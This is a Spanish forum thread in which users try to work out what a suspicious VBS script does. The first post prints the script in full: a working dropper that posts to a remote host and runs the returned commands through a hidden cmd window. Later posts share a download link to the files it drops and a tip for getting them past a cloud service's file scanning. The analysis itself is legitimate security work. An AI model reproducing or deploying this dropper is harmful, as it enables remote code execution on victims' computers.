|
Título: Virus en vbs Publicado por: xDark_R en 9 Febrero 2020, 23:29 pm Descargando unas cositas me he encontrado con un vbs bastante interesante y me gustaria saber que hace, se que transfiere un script al disco duro con extension .au3 pero no he podido abrirlo para ver que hace, alguna idea?
Este es el script dim Winhttps Set Winhttps = CreateObject("Winhttp.WinhttpRequest.5.1") gkpaeb1 = "http://82.111.231.133.static.cdnserver.in/" Winhttps.Open "POST", gkpaeb1, False Winhttps.Send dim Application Application = Wscript.ScriptName CreateObject("Shell.Application").Application.ShellExecute "c:\windows\system32\cmd",Winhttps.responseText & Application,gkpaeb,"",0 Título: Re: Virus en vbs Publicado por: Alvarito050506 en 10 Febrero 2020, 00:39 am Hola xDark_R,
Actualmente la página http://82.111.231.133.static.cdnserver.in está caída, por lo que es imposible saber con exactitud qué es lo que hace este supuesto virus. El resultado del escaneo de VirusTotal no es demasiado "revelador", puedes echarle un vistazo aquí (https://www.virustotal.com/gui/file/3174c941d46383c6d69749b79c547886cc0e13f937a75a3891669d21c07b7661/detection). Tal vez, si subieras el archivo .au3 que mencionaste, podríamos ayudarte mejor. ¡Saludos! Edito: Busca literalmente "cdnserver.in" (con las comillas y todo) en Google, parece haber algo de información por ahí. Seguiré investigando. Título: Re: Virus en vbs Publicado por: xDark_R en 10 Febrero 2020, 00:44 am No se como subirlo, tambien he visto que esta caida pero lo he ejecutado en una maquina virtual y si que funciona.
Título: Re: Virus en vbs Publicado por: Alvarito050506 en 10 Febrero 2020, 00:50 am Por lo de cómo subirlo, cámbiale la extensión a una conocida y súbelo a algún servicio del estilo MEGA que no examine los archivos (maldito Google Drive). Creo que MEGA incluso te deja subir archivos con la extensión que quieras.
Otra cosa que podés hacer antes que nada es abrir el archivo con el Notepad++ o un editor hexadecimal (Bless, hexdump) y fijarte cuales son los primeros seis caracteres, con eso podés saber qué tipo de archivo es en realidad (saber su MIME Type). Con respecto a lo de la máquina virtual, :o, es algún tipo de protección que ofrece Cloudflare, pero no sé más qué decir. Título: Re: Virus en vbs Publicado por: xDark_R en 10 Febrero 2020, 01:10 am He subido todo lo que he conseguido, en la foto esta el código que se ejecuta en la consola de windows y en la carpeta están los archivos que descarga el script
https://mega.nz/#F!5sJg3IhR!klSoZowEAxN7CQVsg8KxZQ (https://mega.nz/#F!5sJg3IhR!klSoZowEAxN7CQVsg8KxZQ) Título: Re: Virus en vbs Publicado por: Alvarito050506 en 10 Febrero 2020, 01:17 am Bueno, el código de la imagen es simplemente una manera "elegante" de descargar los archivos y ejecutar el script de AutoIt base.au3. Buscaré una forma de descompilarlo (las hay miles) pero, mientras tanto, ¿podrías subir el contenido del archivo %temp%\test.txt?
Título: Re: Virus en vbs Publicado por: xDark_R en 10 Febrero 2020, 01:20 am No se crea ese archivo lo he ejecutado varias veces y nada, puede que lo borre después con el otro script (el .au3).
Título: Re: Virus en vbs Publicado por: Alvarito050506 en 10 Febrero 2020, 01:39 am Hmmm... Interesante. Mañana continuaré con la "investigación" :rolleyes:.
|